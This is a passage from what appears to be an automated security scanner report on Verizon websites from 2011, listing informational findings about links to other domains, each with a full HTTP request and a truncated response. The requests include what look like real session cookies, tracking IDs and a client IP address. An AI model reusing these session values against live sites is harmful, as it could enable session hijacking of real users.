User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f3:TM=1314742576:LM=1314798155:S=dIZk57crg6QHX-5i; NID=50=EVKsY54L3WnLcFmjXPXAjOb3iwcJNbnm9_yqCmnH2krqQZeOGuxPy8UbS6Vs8VHIf45QwUrm5shcCN1vf85Xuiz3AKdzOfPR2Bwf553j-IKceDzXGdaLnM6gllEARyoL

Response

HTTP/1.1 302 Found
Location: http://promo.verizon.com/omk/online.shtml
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Mon, 05 Sep 2011 22:42:19 GMT
Server: gws
Content-Length: 238
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://promo.verizon.com/omk/online.shtml">here</A>
...[SNIP]...

15.40. http://www.verizonbusiness.com/(en)/topnav.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /(en)/topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /(en)/topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/about/news/pr-25490-en-Verizon+and+IBM+Launch+Private+Cloud+Based+Managed+Data+Protection+Solution.xml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262243|VP%3d2|RMC%3dxg|LP%3den; __utma=58777642.1910521591.1315279004.1315279004.1315279004.1; __utmb=58777642.7.9.1315279041314; __utmc=58777642; __utmz=58777642.1315279004.1.1.utmcsr=www22.verizon.com|utmccn=(referral)|utmcmd=referral|utmcct=/content/verizonglobalhome/ghp_business.aspx

Response

HTTP/1.1 200 OK
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "dc4106de0e75fac7f3bd8a5571228054"
Last-Modified: Mon, 05 Sep 2011 22:18:10 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 16829
Date: Mon, 05 Sep 2011 22:18:10 GMT
Connection: close
Expires: Tue, 06 Sep 2011 02:16:45 GMT


<div >
<table>
<tr>
<td onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);" class="col1"><a href="/solutions/" />Solutions</a>
<ul class="one">
<li class="666" onMouseOu
...[SNIP]...
<li><a href="http://www22.verizon.com/indirectsales/" onclick="">United States</a>
...[SNIP]...
<li class="666" onMouseOut="vzDO(this)" onMouseOver="vzDD(this)"><a href="https://enterprisecenter.verizon.com" target="_blank">Enterprise Center Sign In</a>
...[SNIP]...

15.41. http://www.verizonbusiness.com/Medium/topnav.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /Medium/topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /Medium/topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
ETag: "5177b22b2a120bddf9cf9940b93509c8"
Last-Modified: Mon, 05 Sep 2011 22:16:42 GMT
Vary: Cookie, User-Agent
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 10644
Date: Mon, 05 Sep 2011 22:16:42 GMT
Connection: close
Expires: Mon, 05 Sep 2011 22:16:43 GMT


<div >
<table>
<tr>
<td class="col1" onMouseOut="if(self.vzDO)vzDO(this);" onMouseOver="if(self.vzDD)vzDD(this);"><a href="/Medium/solutions/" />Solutions</a>
<ul class="one">
<li class="666" onMo
...[SNIP]...
<li class="666" onMouseOut="vzDO(this)" onMouseOver="vzDD(this)"><a target="_blank" href="http://www22.verizon.com/indirectsales/">Indirect Sales</a>
...[SNIP]...

15.42. http://www.verizonbusiness.com/topnav.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /topnav.xml

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /topnav.xml?SetLang=en HTTP/1.1
Host: www.verizonbusiness.com
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BERT=VRID%3d6e76b61a-0caa-4f5d-9d01-7a634d977972|VTID%3de8396f11-b89c-4b23-a26b-edc20acf7fae|SX%3d1315262200|VP%3d1|RMC%3dxg|LP%3den

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
ETag: "5edfdb297456376e9251b4295da193e7"
Last-Modified: Mon, 05 Sep 2011 22:16:43 GMT
Vary: Cookie, User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding
Content-Length: 16829
Date: Mon, 05 Sep 2011 22:16:43 GMT
Connection: close
Expires: Tue, 06 Sep 2011 02:02:16 GMT


<div >
<table>
<tr>
<td onMouseOver="if(self.vzDD)vzDD(this);" onMouseOut="if(self.vzDO)vzDO(this);" class="col1"><a href="/solutions/" />Solutions</a>
<ul class="one">
<li onMouseOver="vzDD(thi
...[SNIP]...
<li><a onclick="" href="http://www22.verizon.com/indirectsales/">United States</a>
...[SNIP]...
<li onMouseOver="vzDD(this)" class="666" onMouseOut="vzDO(this)"><a href="https://enterprisecenter.verizon.com" target="_blank">Enterprise Center Sign In</a>
...[SNIP]...

15.43. http://www.verizonwireless.com/b2c/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /b2c/index.html?tab=business HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; mbox=check#true#1315279000|session#1315278939788-568601#1315280800|PC#1315278939788-568601.19#1316488541; gnVersion=2011Jul31030844; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:16:42 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 23896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lan
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/layout.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/fonts.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/ecom.css?v=11-09" />
   
   
               <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="http://cache.vzw.com/globalnav/css/globalnav-js.css?v=11-09" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->

   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/stylesheets/homepage.css?v=11-09" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="http://cache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="http://cache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="http://cache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="http://cache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
<li><a class="boldLink" href="https://email.vzwshop.com/servlet/website/ResponseForm?OSPE8b6_vimpg_.3dLgLkHs" target="_blank">Signup for email offers</a>
...[SNIP]...
<li style="padding-bottom:3px;"><a class="boldLink" href="https://enterprisecenter.verizon.com">Login to Verizon Enterprise Center</a>
...[SNIP]...
</div>
                   <a class="boldLink" href="https://enterprisecenter.verizon.com">Login to My Verizon Enterprise Center</a>
...[SNIP]...
</a>
               | <a href="https://enterprisecenter.verizon.com/enterprisesolutions/default/selfreg/enrollmentProfileInfo.do" style="margin:0 3px;">Register</a> |
               <a href="http://www.verizonbusiness.com/us/resources/flash/vec/" style="margin-left:3px;">View Demo</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/index.html">Business Products &amp; Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/machinetomachine/index.html">Machine to Machine Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/wirelessemail/index.html">Wireless Email Solutions</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/international/index.html">Global Services</a>
...[SNIP]...
<li><a href="http://b2b.vzw.com/productsservices/businesspromotions.html">Current Promotions</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://cache.vzw.com/scripts/homepage/homeLogin.js"></script>
...[SNIP]...
</span>


                                                                       <a href="http://support.vzw.com/splash/collateraldownload.html">Brochures</a>
...[SNIP]...
</span>
           <a href="http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx">Business</a>
...[SNIP]...
</span>
           <a href="http://www.vzwcareers.com/">Careers</a>
...[SNIP]...
</span>
           <a href="http://aboutus.vzw.com/accessibility/index.html">Accessibility</a>
...[SNIP]...
</span>
           <a href="http://www.lte.vzw.com">LTE Innovation Center</a>
...[SNIP]...
</span>
           <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
<div style="padding-top:5px;">
               <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
</span>
               
               
                   <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/Corporate_Responsibility/Corporate_Responsibility.html">Corporate Responsibility </a>
...[SNIP]...
</span>
               <a href="http://aboutus.vzw.com/wirelessissues/radioEmissions.html">Radio Frequency Emissions</a>
...[SNIP]...
</span>
               
                   <a href="http://aboutus.vzw.com/wirelessissues/avoidpotentialhearingloss.html">Avoid Potential Hearing Loss</a>
...[SNIP]...
</span>
               
               <a href="http://aboutus.vzw.com/wirelessissues/driving.html">Drive Responsibly</a>
...[SNIP]...
</span>
               <a href="http://community.vzw.com">Verizon Wireless Community</a>
...[SNIP]...
</span>
               <a href="http://www.droiddoes.com">Droid Does</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="http://cache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="http://cache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://files.ctia.org/pdf/The_Code.pdf"><img src="http://cache.vzw.com/images_b2c/shared/nav/ctia_seal.gif" width="64" height="62" alt="Consumer Information Code" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="http://cache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="http://cache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="http://cache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="http://cache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...
<noscript>
<iframe src="https://fls.doubleclick.net/activityi;src=685973;type=estor882;cat=vzwbu303;ord=1?" title="" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

15.44. http://www.verizonwireless.com/b2c/store/controller

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verizonwireless.com
Path:   /b2c/store/controller

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /b2c/store/controller?item=phoneFirst&action=viewStoreIndex HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de; NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000; gnVersion=2011Jul31030844; mybizCookie=true; mbox=session#1315278939788-568601#1315280871|PC#1315278939788-568601.19#1316488611|check#true#1315279071; CP=null*

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:20:53 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 21347

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


                                                                       <html xmlns="http://www.w3.org/
...[SNIP]...
<meta http-equiv="imagetoolbar" content="no" />
   
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/layout.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/fonts.css?v=11-09" />
   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/ecom.css?v=11-09" />
   
   
               <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/stylesheets/vzw_jquery.css" />    
   
   <link rel="stylesheet" href="https://scache.vzw.com/globalnav/css/globalnav-js.css?v=11-09" />
   <!--[if lte IE 6]>
...[SNIP]...
<![endif]-->


   <link rel="stylesheet" media="print" type="text/css" href="https://scache.vzw.com/stylesheets/accessiblePrint.css" />


   <link rel="stylesheet" type="text/css" href="https://scache.vzw.com/onlineopinionV5/oo_style.css" />


   <script type="text/javascript">
...[SNIP]...
</script>
   
   
           <script type="text/javascript" src="https://scache.vzw.com/scripts/vzw_jquery.js"></script>        
   
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/globalnav/globalnav.js?v=11-09"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/mootools131more.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/homepage/swfobject.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/library.js?v=11-09"></script>
   
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxVariables.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbxFunctions.js"> </script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/offermatica/mbox.js"></script>

   
       <script type="text/javascript" src="https://scache.vzw.com/scripts/liveperson/mtagconfig.js"></script>
...[SNIP]...
</span>


                                                                           <a href="http://www22.verizon.com/privacy/">Privacy</a>
...[SNIP]...
</span>
       <a href="http://business.verizon.net" onclick="popUp(this.href,'popup',400,500);return false;">Small Business Center</a>
...[SNIP]...
</span>
       <a href="http://www.trade-in.vzw.com">Trade-In Program</a>
...[SNIP]...
<div class="footerIcons">
           <script src="https://seal.verisign.com/getseal?host_name=www.verizonwireless.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=NO&amp;lang=en" type="text/javascript"></script>
           
           <a href="http://www.verizonwireless.com/b2c/globalText?contentType=globalContent"><img src="https://scache.vzw.com/images_b2c/shared/nav/finalmark.gif" alt="TRUST-e Privacy" height="72" width="125" /></a>
           
           <a href="http://www.bbbonline.org/cks.asp?id=10305271131732383" onclick="popUp(this.href,'popup',450,300);return false;"><img src="https://scache.vzw.com/images_b2c/shared/nav/bbb_online.gif" height="72" width="103" alt="BBB Accredited Business" /></a>
           
           <a href="http://aboutus.vzw.com/securecode/visa.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/vbvlogo.jpg" height="52" width="79" alt="Verified by Visa" /></a>
           <a href="http://aboutus.vzw.com/securecode/mastercard.html" onclick="popUp(this.href,'popup',600,593);return false;"><img src="https://scache.vzw.com/images_b2c/shared/mcsclogo.jpg" height="50" width="80" alt="MasterCard SecureCode" /></a>
...[SNIP]...
</script>


   <script type="text/javascript" src="https://scache.vzw.com/js/shared/hbx/hbx.js">
</script>
...[SNIP]...
</script>
   
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/customnote.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/lib.js"></script>
   <script type="text/javascript" src="https://scache.vzw.com/scripts/accessible/layers.js"></script>
...[SNIP]...
</script>
       
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_engine.min.js"></script>
       <script type="text/javascript" charset="windows-1252" src="https://scache.vzw.com/onlineopinionV5/oo_conf.js"></script>
...[SNIP]...

15.45. http://www22.verizon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /?lid=//global//residential HTTP/1.1
Host: www22.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
Cookie: ak-sf=false; __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; ASP.NET_SessionId=ncxmtseom3hg3h4542cc0c55; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; hbxRet=Y; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ca45525d5f4f58455e445a4a423660; Product=A; ProductXML=A; BusinessUnit=residential

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 128866
Cache-Control: private, max-age=1800
Date: Mon, 05 Sep 2011 22:14:18 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head >
<title>Verizon | Broadband (DSL) Internet Service, Cable TV (Digital TV,
...[SNIP]...
<LI><A style="WIDTH: 63px" title="Verizon Wireless" href="http://www.verizonwireless.com/" name=&amp;lid=hp_wireless_tab>Wireless</A>
...[SNIP]...
<LI><A href="http://www.verizonwireless.com/b2c/index.html" name=&amp;lid=overlay_phone_wireless><IMG alt="" src="/Content/Commonfiles/images/globalheader/new_header/i/wireless.gif">
...[SNIP]...
<BR>* Source: June 2010 Proprietary survey conducted by ChangeWave Research. Based on HD and overall picture quality ratings among a panel of educated consumers. For more on ChangeWave Research, visit <A href="http://www.changewaveresearch.com/">www.changewaveresearch.com</A>
...[SNIP]...
<LI><A id=foundation href="http://www.thinkfinity.org/" name=&amp;lid=hp_bus_footer_vzthinkfinity>Verizon Thinkfinity</A>
...[SNIP]...
<LI><A id=foundation href="http://www.facebook.com/VerizonFiOS" name=&amp;lid=hp_res_footer_verizon_on_facebook>Verizon on Facebook</A>
...[SNIP]...
<!--document.domain = "www26.verizon.com" -->
<iframe src="https://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=1?" width="1" height="1"

frameborder="0">
</iframe>
...[SNIP]...

15.46. http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /Foryourhome/MyAccount/Unprotected/ak-cached/origin/SupportService.aspx?Load=CS HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/Foryourhome/MyAccount/Unprotected/UserManagement/Login/Login.aspx
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; ASP.NET_SessionId=ohvu5z3kkpwvafzn25j03knx; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; canigetfios=Y; showpromo=N; XPID=OO-00000000000000000_%20%7C%20HSIPOE_2; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; NSC_xxx22_kpct_80_mcw=ffffffff895bfec845525d5f4f58455e445a4a423660; dtCookie=8C98328CB529EE605B41B254E42B3E4A; NSC_xxx22_pofdnt_mcw=ffffffff895bfecb45525d5f4f58455e445a4a423660; dtLatCT=1315279121983|1|297; companytype=vzw; dtSa=-; __utma=134513271.515216044.1315279122.1315279122.1315279122.1; __utmb=134513271.2.10.1315279122; __utmc=134513271; __utmz=134513271.1315279122.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=.verizon.com; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; ContextInfo_State=CA; BusinessUnit=residential; ASPSESSIONIDSSSQRDBD=OKFEALDCAMMGCEMFOLLNBJBB; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69245525d5f4f58455e445a4a42366a; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; 
vzinhomeagent=GUID=OQAwADQAMgAzAGQAMAA1AC0ANwA3ADAAMgAtADQANwAzAGUALQBhAGQAMAA3AC0ANQA3AGMAYwBkADUAYgAyAGMAMQA0ADYA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMQA3ADgAMQA2ADMAOQA5ADwALwBUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4A&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIAUwBUAEIARgByAG8AegBlAG4A&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIAUwBUAEIARgByAG8AegBlAG4APAAvAFQAZQB4AHQAPgA8AC8AVQBzAGUAcgBUAGUAeAB0AD4A&AccountIDAuthMode=bgBvAA==; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc65945525d5f4f58455e445a4a423660; WT_FPC=id=27bb86d4bd1c3b1dd581315275882795:lv=1315275882795:ss=1315275882795; vzapps=ZIPCODE=10010; BPSPANISH=N; NSC_xxx22_gztncja_80_mcw=ffffffff895bc6ba45525d5f4f58455e445a4a423660; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; ContextInfo_TV=FiOSTV; IHAClientIP=112.64.2.103; 